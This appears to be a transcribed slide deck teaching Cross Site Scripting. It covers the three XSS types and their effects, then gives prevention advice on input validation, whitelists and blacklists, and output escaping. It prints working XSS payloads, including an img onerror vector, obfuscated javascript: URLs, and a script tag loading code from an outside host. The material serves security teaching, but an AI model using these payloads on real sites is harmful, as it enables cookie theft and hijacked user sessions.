Transcript
Cross Site Scripting (XSS)
What is XSS ?
Cross Site Scripting
lXSS is a vulnerability which when present in websites or web
applications, allows malicious users (Hackers) to insert their
client side code (normally JavaScript) in those web pages.
lWhen this malicious code along with the original webpage gets
displayed in the web client (browsers like IE, Mozilla etc), allows
Hackers to gain greater access of that page.
XSS (-ve) effects
stealing other user’s cookies
l stealing their private information
l performing actions on behalf of other users
l redirecting to other websites
l
lShowing ads in hidden IFRAMES and pop-ups
Type of XSS attacks
lNon-persistent (Reflected)
lPersistent (Stored)
lDOM Based
Non-persistent
lWhen XSS code only gets displayed in the next page to the same user
and not gets saved into persistent storage like database.
lThis type of attack is less harmful, because Hacker can see only their
own cookies and can make modifications in their own current opened
pages.
Vector : %u3008script%u3009alert(document.domain);%u3008/script%u3009
Persistent XSS
l In persistent type of XSS attack, XSS code gets saved into
persistent storage like database with other data and then it is visible
to other users also.
l This type of attack is more vulnerable, because Hacker can steal
cookies and can make modifications in the page.
Vector:
<b onmouseover=alert(/000/);>Click me!</b>
DOM based attack
lDOM Based XSS (or type-0 XSS) is an XSS attack wherein the attack
payload is executed as a result of modifying the DOM environment in the victim s browser used by the original client side script, so that the client side code runs in an unexpected manner.
l That is, the page itself (the HTTP response that is) does not change,
but the client side code contained in the page executes differently due
to the malicious modifications that have occurred in the DOM
environment.
l
Vector:
#”><img src=x onerror=prompt(1);>
Prevention
Never trust the
user input data
No matter where it’s coming from ( GET, POST, COOKIE etc.
Validation at server
lBy sanitizing the input data, we can prevent the malicious
code to enter in the system. lChecking the proper data types helps in cleaning the data.
First of all we should restrict numeric data for numeric fields and
only alphanumeric characters for text fields
l lWhite lists – Allow <strong>, <em> and <br> only – Does help,
but not 100%
l lBlacklists – Block <script> and other attributes such as onload,
onclick, onmouseover etc.
Demo:Bypassing Blacklist WAF
Validation at client side
lBy performing client side (JavaScript) validation,
before submitting the data to server, helps only in
usability aspect of the website.
lIt can’t provide any actual security, because user can
disable the JavaScript. Many JavaScript libraries and
frameworks are available for this.
Escaping output at server
Problem characters can include < > " \ &.These characters can be
replaced with HTML character entities.
For example, < can be replaced with <.
5 Rules for escaping output
#1 - HTML Escape before inserting into element content
#2 - Attribute Escape before inserting into attributes
#3 - JavaScript Escape before inserting into JavaScript data values
#4 - CSS Escape before inserting into style property values
#5 - URL Escape before inserting into URL attributes
XSS vectors
l<IMG SRC=javascript:alert('XSS')> l<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> l<IMG SRC=javascript:alert("XSS")> l<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> l<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> l<IMG
SRC=javascript:alert(String.fromCharCode(88,83,83))> l<IMG
SRC=javascri
2;t:alert('&
#88;SS')>
l
References
http://en.wikipedia.org
http://ha.ckers.org/xss.html
http://www.bugsheet.com/cheat-sheets/100-xss-vectors-by-
ashar-javed
http://www.acsa-
admin.org/openconf2008/modules/request.php?module=oc_pr
ogram&action=view.php&id=104
Thank you
top related